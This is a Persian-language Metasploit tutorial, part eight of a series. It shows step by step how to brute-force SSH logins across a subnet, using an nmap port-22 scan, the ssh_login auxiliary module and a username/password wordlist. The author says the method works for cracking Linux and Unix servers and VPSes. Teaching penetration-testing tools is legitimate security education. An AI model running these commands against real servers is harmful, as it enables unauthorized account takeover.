سلام دوستان . قسمت هشتم از آموزش های متااسپلویت را در پیش رو داریم . در این قسمت با یک Auxiliary Modules در خصوص ssh آشنا خواهیم شد . روند کار به این صورت است که فایلی حاوی یوزر و یا پسورد ها را همراه با گروهی از آی پی ها در این Module مشخص می کنیم تا یوزر و پسورد های احتمالی بر روی تمامی IP ها تست و آزمایش شود . در واقع به کرک ssh روی گروه زیادی از سیستم ها می پردازیم .
لازم به ذکر است که از این روش می توان در کرک سرور و vps لینوکسی و یا حتی یونیکسی استفاده کرد .
توپولوژی فرضی شبکه :
قبل از استفاده از این Module ابتدا با استفاده از nmap شبکه را روی پورت 22 اسکن می کنیم سپس خروجی اسکن رو در یک فایل xml ذخیره می کنیم . در نهایت آی پی هایی که پورت 22 روی آن ها باز است را به دیتابیس متااسپلویت منتقل می کنیم .
پس ابتدا لازم است :
nmap 192.168.94.0/24 -p 22 -oX /root/output.nmap.dir/nmap.port22.output.xml
حال همان طور که در قسمت گذشته یاد گرفتیم این خروجی را به دیتابیس منتقل می کنیم . فقط توجه داشته باشید که در این اسکن سیستم خودمون هم در آخر اسکن شده و باید آن را از دیتابیس پاک کنیم . پس به شکل زیر عمل می کنیم :
msf > hosts -d 192.168.94.10
حالا تارگت ها آماده ی استفاده هستند
اما برای فراخوانی این Module ابتدا به شکل زیر عمل خواهیم کرد :
msf > use auxiliary/scanner/ssh/ssh_login
مثل گذشته برای مشاهده ی اطلاعات جامع تر به شکل زیر عمل می کنیم :
msf auxiliary(ssh_login) > show options
پورت پیش فرض ssh بر روی 22 است اما اگر تارگتی خاص دارید و می دانید که پورت پیش فرض را تغییر داده است , لازم است که آن را به شکل زیر تعیین کنید :
msf auxiliary(ssh_login) > set RPORT 2323
ما در این سناریو پورت را بر روی 22 فرض می کنیم .
در مرحله ی بعد باید تارگت هایی که در بالا در دیتابیس ذخیره کرده ایم را به عنوان rhost به این Module معرفی کنیم . برای این منظور به شکل زیر عمل می کنیم :
msf auxiliary(ssh_login) > hosts -R
برای این که خروجی ای تمیز تر داشته باشیم و فقط یوزر و پسورد های پیدا شده رو مشاهده کنیم , verbose را غیر فعال می کنیم :
msf auxiliary(ssh_login) > set VERBOSE false
در نهایت فایل حاوی username و password های احتمالی خودمون رو مشخص می کنیم :
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
توجه داشته باشید که فایل بالا به طور پیش فرض بر روی کالی لینوکس موجود است .
در نهایت این Module را به شکل زیر اجرا می کنیم :
msf auxiliary(ssh_login) > run
موفق و موید باشید .
منبع : او اس لرن دات آی آر | http://OSLearn.ir
نویسنده : E2MA3N